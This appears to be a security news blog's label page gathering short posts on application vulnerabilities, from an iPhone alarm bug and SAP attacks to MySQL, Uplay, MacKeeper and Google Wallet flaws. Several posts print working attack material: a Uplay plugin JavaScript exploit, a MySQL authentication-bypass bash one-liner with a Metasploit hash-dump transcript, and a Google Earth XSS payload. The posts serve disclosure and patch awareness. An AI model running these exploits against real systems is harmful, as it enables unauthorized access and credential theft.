Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Application Vulnerability. Show all posts

Apple Working to Patch Alarming iPhone Issue

 

Apple claims to be working rapidly to resolve an issue that resulted in some iPhone alarms not setting off, allowing its sleeping users to have an unexpected lie-in. 

Many people rely on their phones as alarm clocks, and some oversleepers took to social media to gripe. A Tiktokker expressed dissatisfaction at setting "like five alarms" that failed to go off. 

Apple has stated that it is aware of the issue at hand, but has yet to explain what it believes is causing it or how users may avoid a late start. 

It's also unknown how many people are affected or if the issue is limited to specific iPhone models. The news was first made public by the early risers on NBC's Today Show, which sparked concerns. 

In the absence of an official solution, those who are losing sleep over the issue can try a few simple fixes. One is to prevent human error; therefore, double-check the phone's alarm settings and make sure the volume is turned up. 

Others pointed the finger at Apple designers, claiming that a flaw in the iPhones' "attention aware features" could be to blame.

When enabled, they allow an iPhone to detect whether a user is paying attention to their device and, if so, to automatically take action, such as lowering the volume of alerts, including alarms. 

According to Apple, they are compatible with the iPhone X and later, as well as the iPad Pro 11-inch and iPad Pro 12.9-inch. Some TikTok users speculated that if a slumbering user's face was oriented towards the screen of a bedside iPhone, depending on the phone's settings, the functionalities may be activated. 

Apple said it intends to resolve the issue quickly. But, until then, its time zone-spanning consumer base may need to dust off some old gear and replace TikTok with the more traditional - but trustworthy - tick-tock of an alarm clock.

Active Cyber Attacks on Mission-Critical SAP Apps

 

Security researchers are warning about the arrival of attacks targeting SAP enterprise applications that have not been updated to address vulnerabilities for which patches are available, or that utilize accounts with weak or default passwords. 

Over 400,000 organizations worldwide and 92% of Forbes Global 2000 use SAP's enterprise apps for supply chain management, enterprise resource planning, product lifecycle management, and customer relationship management.

According to a study released jointly by SAP and Onapsis, threat actors launched at least 300 successful attacks on unprotected SAP instances beginning in mid-2020. Six vulnerabilities have been exploited, some of which can provide complete control over unsecured applications. Even though SAP had released fixes for all of these flaws, the targeted companies had not installed them or were using unsecured SAP user accounts. 

"We're releasing the research Onapsis has shared with SAP as part of our commitment to help our customers ensure their mission-critical applications are protected," Tim McKnight, SAP Chief Security Officer, said. 

"This includes applying available patches, thoroughly reviewing the security configuration of their SAP environments, and proactively assessing them for signs of compromise." Researchers also observed attackers targeting six flaws, these flaws, if exploited, can be used for lateral movement across the business network to compromise other systems. 

The threat actors behind these attacks have exploited multiple security vulnerabilities and insecure configurations in SAP applications in attempts to breach the targets' systems. In addition, some of them have also been observed while chaining several vulnerabilities in their attacks to "maximize impact and potential damage."

According to an alert issued by CISA, organizations impacted by these attacks could experience, theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and halt of all operations. 

Patching vulnerable SAP systems should be a priority for all defenders since Onapsis also found that attackers start targeting critical SAP vulnerabilities within less than 72 hours, with exposed and unpatched SAP apps getting compromised in less than three hours. 

Both SAP and Onapsis recommended organizations to protect themselves from these attacks by immediately performing a compromise assessment on SAP applications that are still exposed to the targeted flaws, with internet-facing SAP applications being prioritized. 

Also, companies should assess all applications in the SAP environment for risk as soon as possible and apply the relevant SAP security patches and secure configurations; and assess SAP applications to uncover any misconfigured high-privilege user accounts.

"The critical findings noted in our report describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years," said Onapsis CEO Mariano Nunez.

"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action" Nunez added.

Cisco Talos Researchers Discovered Multiple Susceptibilities in SoftMaker Office TextMaker

 

Cisco Talos researchers exposed multiple vulnerabilities in SoftMaker Office TextMaker that can be exploited by cyber attackers. These vulnerabilities in SoftMaker office can be exploited for arbitrary code execution by generating malicious documents and deceiving victims into opening them. 

SoftMaker Office TextMaker is a German-based software developer; it has various suites like a spreadsheet, word processing, presentation, and database software components, and all these well-liked software suites are presented to individuals and enterprises. The common and internal document file formats also acquire the support of the SoftMaker office suite. 

The foremost issue is a sign extension bug, CVE-2020-13544 which influences the document-analyzing functionality of SoftMaker Office TextMaker 2021 and the subsequent vulnerability has been traced as CVE-2020-13545 which is a sign altering flaw in the same document-analyzing of the application. 

Cisco Talos researchers illustrated that “a specially crafted document can cause the document parser to sign-extend a length used to terminate a loop, which can later result in the loop’s index being used to write outside the bounds of a heap buffer during the reading of file data”. A heap-based memory can be corrupted by an attacker who can adeptly design a document which can lead to the document analyzer. 

The document analyzer can misjudge the length while assigning a buffer which will lead the application to be written outside the bounds of the buffer. Traced as CVE-2020-13546, the flaw is detected to affect the SoftMaker Office 2021 by integer overflow susceptibility. 

SoftMaker office 2021 was evaluated with a Common Vulnerability Scoring System (CVSS) of 8.8 and now all three vulnerabilities are secured. The most threatening issue was that the attacker can exploit the loophole in the SoftMaker office in 2021 from any remote location.

Security flaw in Bluetooth-enabled devices






A group of security researchers at the Center for IT-Security, Privacy, and Accountability (CISPA) found a flaw that could affect billions of Bluetooth-enabled devices, which includes smartphones, laptops, smart IoT devices, and other devices.

The experts named the vulnerability as CVE-2019-9506 and they tagged it as a KNOB (Key Negotiation of Bluetooth).

According to the researchers, the flaw in Bluetooth’s authentication protocols enables hackers to compromise the devices and spy on data transmitted between the two devices. The astonishing fact about the flaw is that the hackers could exploit this vulnerability even though the devices had been paired before.

However, the KNOB’s official website, every standard-compliant Bluetooth device could be exploited. “We conducted KNOB attacks on more than 17 unique Bluetooth chips (by attacking 24 different devices). At the time of writing, we were able to test chips from Broadcom, Qualcomm, Apple, Intel, and Chicony manufacturers. All devices that we tested were vulnerable to the KNOB attack,” it reads.

Bluetooth SIG has issued a security notice regarding the vulnerability.

  • Conditions for a successful attack:
  • Both the devices have to be vulnerable
  • Both the devices have to be within the range establishing a BR/EDR connection. If any of the devices are not affected by the vulnerability, the attack wouldn’t work
  • Direct transmissions between devices while pairing has to be blocked
  • Existing connections won’t lead to a successful attack — it has to be done during negotiation or renegotiation of a paired device connection


Bluetooth  SIG has started working on updating a remedy for the flaw. 

Vulnerability in DHCP client let hackers take control of network

A critical remote code execution vulnerability that resides in the DHCP client allows attackers to take control of the system by sending malicious DHCP reply packets.

A Dynamic Host Configuration Protocol (DHCP) Client allows a device to act as a host requesting-configuration parameter, such as an IP address from a DHCP server and the DHCP client can be configured on Ethernet interfaces.

In order to join a client to the network, the packer required to have all the TCP/IP configuration information during DHCP Offer and DHCP Ack.

DHCP protocol works as a client-server model, and it is responsible to dynamically allocate the IP address if the user connects with internet also the DHCP server will be responsible for distributing the IP address to the DHCP client.

This vulnerability will execution the remote code on the system that connected with vulnerable DHCP client that tries to connect with a rogue DHCP server.

Vulnerability Details The remote code execution vulnerability exactly resides in the function of dhcpcore.dll called “DecodeDomainSearchListData” which is responsible for decodes the encoded search list option field value.

During the decoding process, the length of the decoded domain name list will be calculated by the function and allocate the memory and copy the decoded list.

According to McAfee research, A malicious user can create an encoded search list, such that when DecodeDomainSearchListData function decodes, the resulting length is zero. This will lead to heapalloc with zero memory, resulting in an out-of-bound write.

The vulnerability has been patched, and it can be tracked as CVE-2019-0547, The patch includes a check which ensures the size argument to HeapAlloc is not zero. If zero, the function exits.

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

How the Mackeeper failed to secure Mac


Mackeeper, the program designed to keep Mac computers secure suffers from a critical remote code execution vulnerability.

This flaw lies in the lack of input validation during the handling of custom URLs by the program. It allows hackers to execute arbitrary commands with root privilege with little to no user interaction. It can happen when users visited specially crafted webpages in the Safari browser.

If the user had already provided their password to MacKeeper during normal course of operation of the program, the user will not be alerted for their password prior to the execution of the arbitrary command.

If the user did not previously authenticate, they will be prompted to enter their authentication details, however, the text that appears for the authentication dialogue can be manipulated to appear as anything, so the user might not realize the true consequences of the action.

The vulnerability, quite possibly a zero-day one was discovered by security researcher Braden Thomas who released a demonstration link as proof-of-concept (POC) through which the Mackeeper program was automatically un-installed upon simply clicking the external link. 

Mackeeper is a controversial program amongst the Mac users owing to its pop-up and advertisements, but apparently has 20 million downloads worldwide.

The vulnerability existed even in  the latest version 3.4. The company has advised users to run Mackeeper update tracker and install 3.4.1 or later. For users who have not updated, they can use a browser other than Safari or remove the custom URL scheme handler from Mackeeper's info.plist file.

VMware Patches critical directory traversal vulnerability in its VMware View


VMware has patched a critical directory traversal vulnerability in its View VMWare desktop virtualization platform that could allow a hacker to access arbitrary files from affected View Servers.

The vulnerability affects both the View Connection Server and the View Security Server. The vulnerability was discovered by Digital Defense, a security service provider.

According to VMware advisory, the affected versions are View 5.x prior to 5.1.2 and 4.x prior to 4.6.2. Users are advised to upgrade to the latest version.

Users who are unable to immediately update their View Servers are advised to "Disable security server" or "blocking directory traversal attacks with an intrusion detection/prevention system or an application firewall".

CVE-2012-4170 : Adobe fixes Buffer Overflow Vulnerability in Photoshop


Adobe has released an update to Photoshop CS6 with version 13.0.1. This update closes a critical Remote Buffer overflow vulnerability in the PNG Image Processing.

Francis Provencher has discovered a vulnerability in Adobe Photoshop CS6, which can be exploited by malicious people to compromise a user's system.

According to Secunia advisory, The vulnerability is caused due to a boundary error in the "Standard MultiPlugin.8BF" module when processing a Portable Network Graphics (PNG) image. This can be exploited to cause a heap-based buffer overflow via a specially crafted "tRNS" chunk size.

Successful exploitation may allow execution of arbitrary code, but requires tricking a user into opening a malicious image.

The vulnerability is reported in versions 13.x only for Windows and Macintosh (confirmed in 13.0 20120315.r.428 on Windows).

Users can upgrade to Photoshop CS6 13.0.1 by selecting "Updates" under the Photoshop Help menu; this will launch the Adobe Application Manager, allowing users to select and install the update.

CVE-2012-0681 : Apple fixes Information disclosure vulnerability in Remote Desktop


Apple has released version 3.6.1 of its Apple Remote Desktop application to fix an information disclosure vulnerability.

Vulnerability Details(CVE-2012-0681):
When connecting to a third-party VNC server with "Encrypt all network data" set, data is not encrypted and no warning is produced.

According to Apple security advisory,  This issue does not affect Apple Remote Desktop 3.5.1 and earlier. Versions 3.5.2 up to and including 3.6.0 are affected;

The latest version 3.6.1 address this issue by creating an SSH tunnel for the VNC connection when "Encrypt all network data" is set. If this is not possible, ARD will prevent the connection.

Apple Remote Desktop 3.6.1 may be obtained from Mac App Store,the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Prolexic found Vulnerability in Popular Dirt Jumper DDoS toolkit


Security Vendor Prolexic has discovered a critical vulnerability in the popular Dirt Jumper DDoS Toolkit family used  by hackers to launch distributed denial of service attacks against corporate networks.

“DDoS attackers take pride in finding and exploiting weaknesses in the architecture and code of their targets. With this vulnerability report, we’ve turned the tables and exposed crucial weaknesses in their own tools,” said Scott Hammack, CEO at Prolexic.

Prolexic found security holes in the simplest part of the program, namely the GUI control panels used to control bots created by it which turned out to be cobbled together using hastily-coded PHP/MySQL scripts.

"With this information, it is possible to access the C&C server and stop the attack," Prolexic CEO Scott Hammack said in statement. "Part of our mission is to clean up the Internet. It is our duty to share this vulnerability with the security community at large."

CVE-2012-2665: LibreOffice vulnerable to multiple Heap-based buffer overflows


CVE-2012-2665: Few weeks after releasing the LibreOffice 3.5.5, The Document Foundation has confirmed that security holes in earlier versions of the open source LibreOffice .

According to the security advisory,  Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice.

An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution.

Versions up to and including LibreOffice 3.5.4 are affected; Users are advised to upgrade your software to version 3.5.5 or 3.6.0.

Vulnerability in Ubisoft Uplay allows attacker to gain control of your computer



Google security Researcher ,Tavis Ormandy, has discovered a critical vulnerability in Ubisoft Uplay plugin software that could allow hackers to remotely install programs onto your PC.

It is possible for attackers to use a few lines of JavaScript to persuade the plugin to launch arbitrary processes – the potential victim only needs to open a specially crafted web page.

"While on vacation recently I bought a video game called 'Assassin's Creed Revelations,' he posted on the Full Disclosure mailing list. "I noticed the installation procedure creates a browser plugin for its accompanying Uplay launcher, which grants unexpectedly (at least to me) wide access to websites."

The javascript code that exploits the vulenrability:
var x = document.createElement('OBJECT');

x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Here is a proof-of-concept page, users can check if their system is vulnerable: the page attempts to start the Windows Calculator.

Ubisoft has fixed a security flaw.

“We have made a forced patch to correct the flaw in the browser plug-in for the Uplay PC application that was brought to our attention earlier today. We recommend that all Uplay users update their Uplay PC application without a Web browser open. This will allow the plug-in to update correctly. An updated version of the Uplay PC installer with the patch also is available from Uplay.com."Ubisoft statement reads.

"Ubisoft takes security issues very seriously, and we will continue to monitor all reports of vulnerabilities within our software and take swift action to resolve such issues.”

Yahoo! app vulnerability could be behind 'Android botnet'



Earlier this month, Microsoft Engineer ,Terry Zink said he discovered spam was being sent from compromised Yahoo accounts from what looked like an international Android spam botnet.

He stated that the messages all come from Yahoo Mail servers. They are all from compromised Yahoo accounts. They are sending all stock spam, the typical pump and dump variety that we’ve seen for years.  Furthermore, they all have the 'Sent from Yahoo! Mail on Android' text at the bottom of their spam.


Google, however, refuted that the spam were sent from an Android botnet, stating that the spammers behind this may have used infected PCs and fake mobile signature in an attempt to bypass email filters.

Security Researchers at Lookout have identified a security hole in the Yahoo! Mail app for Android, which they believed to be responsible for the so-called mobile spam botnet. Today, Trend Micro experts have confirmed the existence of the vulnerability.

They couldn’t precisely say if the vulnerability is in fact responsible for the spam sent out from mobile phones, but the fact that they independently appoint the same weakness as a possible cause makes this scenario even more plausible.


The vulnerability discovered by the researchers allow an attacker to gain access to a user’s Yahoo! Mail cookie.

This bug stems from the communication between Yahoo! mail server and Yahoo! Android mail client. By gaining this cookie, the attacker can use the compromised Yahoo! Mail account to send specially-crafted messages. The said bug also enables an attacker to gain access to user’s inbox and messages.

A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers reveal the existence of a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server.Th vulnerability has been assigned to CVE-2012-2122 id;

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf auxiliary(mysql_authbypass_hashdump) > run



[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Reference:
Rapid7

TrueCaller Vulnerability Allows Changing Users Details

A security Researcher Ali AlHabshi,from Kuwait WhiteHat, has discovered a vulnerability in TrueCaller iPhone App that allows hackers to change user details.

He report about the vulnerability to True  Software.  True Software confirmed the vulnerability and released new version '2.78' of TrueCaller to fix the vulnerability.

The Vulnerability Details:
 The application allows users to search numbers if and only if the user enables Enhanced Search feature. When enabled, the user is warned that his contacts will be shared with other users to search and his address book is sent to TrueCaller database.

 This process is done by sending the following HTTP “cleartext” request:
post_contact_data=[{"REV":"","FN":"ContactName","TEL_CELL":["MobileNumber"],”TCBID”:”Number“,”FID”:”Number“,”TEL_WORK”:[Number],”TEL_HOME”:[],”CONTACT_ID”:”3619″,”LID”:”"}

From a security point of view, this is a bad security behavior and may lead to one of the following situations:

Privacy Issues
Although TrueCaller has a strict privacy policy, this behavior allows 3rd parties (i.e. ISP’s, Governments, Sniffers..etc) to intercept database entries and build a copy of TrueCaller’s database.

Fake Data
The “cleartext“, unencrypted POST request may be leveraged to fake/change/modify address book entries by repeating the POST request with fake entries in the parameter and fill TrueCaller’s database with fake (rogue) entries.

Here’s an example of the an intercepted request after enabling Enhanced Search feature:


Enabling Enhanced Search features without having to share user’s Address Book:
When the user enables “Enhanced Search”, the application sends an encrypted HTTP GET request, followed by the HTTP POST request outlined above. If a malicious user allows the GET request to pass and “drops” the following POST request (which contains his address book), he will be able to enjoy the Enhanced Search feature without sharing his address book, which TrueCaller really do not want to happen.

Advisory Timeline
28/Apr/2012 – First contact: Vulnerability details sent
29/Apr/2012 – Response received: Asked for more details
29/Apr/2012 – Second Contact: More details provided and cleared TrueCaller doubts
30/Apr/2012 – Vulnerability Confirmed: TrueCaller started working on a fix
01/May/2012 – Vulnerability Fixed: Fix submitted to Apple for approval
17/May/2012 – New Version Released: Fix approved by Apple and released
01/Jun/2012 - Vulnerability Released.

Vulnerability in TreasonSMS allows hackers to run malicious code in iPhone


Vulnerability-lab researchers discovered HTML Inject & File Include Vulnerability in the TreasonSMS app that allows hackers to run the malicious code inside the iPhone.

About TreasonSMS app:
TreasonSMS allows you to send SMS from your desktop computer. It turns your iPhone into a SMS webserver, so you can send sms and reply to SMS from your computer over wifi.

According to the security advisory provided by researchers, the vulnerability allows an remote attacker to include malicious persistent script codes on application-side of the iphone.

This possible way allows the attacker also to inject for example webshell scripts to get control of the affected application folder. When the IPhone is jailbreaked the vulnerability exploitation can also result full controll of the affected IPhone.

"The Bug is located in the input fields of the Message Sending & Message Output. An attacker can scan the victim on walkthrough because the ip of the webserver makes the treasonSMS available to anybody without password.To exploit somebody on a walkthourgh its only required to scan for the stable ip via wlan and access the panel for exploitation." Researcher said.

The vulnerability-Lab estimated the vulnerability as High Severity.

Vulnerability in Facebook app for Android & iOS leads to Identity theft


A new security vulnerability in Facebook application for Android and iOS allows an attacker to steal your Facebook identity.

Gareth Wright,a UK-based app developer for android and iOS has identified a security vulnerability in Facebook mobile application. The problem is that Facebook app doesn't encrypt your login credentials ,leaving them accessible to other malicious apps or USB connections.

He explained the about the hack in this blog post.

Facebook responded this vulnerability discover by issuing the following statement:
"Facebook’s iOS and Android applications are only intended for use with the manufacturer provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device.

"We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device."
This statement appears to indicate that it is only for jailbroken devices; TheNextWeb(TNW) says it is untrue, "Your Facebook app on iOS is absolutely vulnerable because using a tool like iExplore, which is what Wright used to perform his white label hack, does not require a jailbreak."

Researchers also discovered that popular file-syncing app Dropbox also exhibits the vulnerability.

Code Execution vulnerability in Google Earth found by longrifle0x


A code Execution vulnerability in Google Earth application was identified by Security Researcher Ucha Gobejishvili (also known as longrifle0x). The researcher demonstrated the attack in his own blog.

The PlaceMark field in the app is found to be vulnerable and allows an attacker to run javascript code. Hacker demonstrated the attack by inserting the following code:
<A HREF="javascript:document.location='http://www.secday.blogspot.com/'">XSS</A><marquee>Georgia</marquee>
The above tag will execute the script and load the secday.blogspot.com.

GOM Media Player v. 2.1.37 vulnerable to Buffer Overflow Attack

Security Researcher Ucha Gobejishvili (longrifle0x),Vulnerability Lab, discovered Buffer overflow vulnerability in the GOM Media player application. Version 2.1.37 found to be vulnerable to this attack.

Buffer overflow:
         An app is said to be vulnerable to when it allows attackers to store the the data in a buffer beyond the size allocated for it. By successfully exploiting the vulnerability, an attacker can run an arbitrary code.
Researcher claimed the vulnerability can exploited by local and remote attackers. Researcher estimated this vulnerability risk as high.

POC:
1) Download & open the software client
2) Click open ==> Url..
3) Put vulnerability code
4) now you will see result

The video that demonstrate the vulnerability:

Google Wallet's PIN System can be easily cracked from rooted devices

Joshua Rubin, a security researcher at zvelo, have discovered that Google Wallet PIN can be cracked easily by brute forcing on a device that is "rooted".

Google Wallet is the first publicly available Near Field Communication (NFC) Payment System that purports to turn to your smartphone into a credit card, allows to purchase by entering a PIN .

In order to facilitate secure transactions,  NFC use hardware component called Secure Element(SE) which is used to store your confidential data such as the complete credit card number.

In order to authenticate users and grant access to the SE, Google Wallet requires a 4-digit, numeric PIN when first launching the app. Unfortunately, the PIN is not stored on the SE , but instead it is stored as a salted SHA256 Hash on the device itself.
"Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes."Joshua Rubin said ." This is trivial even on a platform as limited as a smartphone. Proving this hypothesis took little time."

Google Wallet only allows five invalid PIN entry attempts before locking the user out,but with root access you can bruteforce the PIN without a single invalid attempt.

Rubin concludes that the only way to solve this issue would be to move the PIN verification into the SE itself and to no longer store the PIN hash and salt outside the SE.


Google has issued this statement on the matter:
The Zvelo study was conducted on their own phone on which they disabled the security mechanisms that protect Google Wallet by rooting the device. To date, there is no known vulnerability that enables someone to take a consumer phone and gain root access while preserving any Wallet information such as the PIN.

This confirms that there should be no issue unless your phone has already been rooted. If you have rooted your smartphone, Google strongly encourage you to not install Google Wallet and to always set up a screen lock as an additional layer of security for their phone.(like activating the lock screen, disabling the USB debugging option in settings, and enabling full-disk encryption).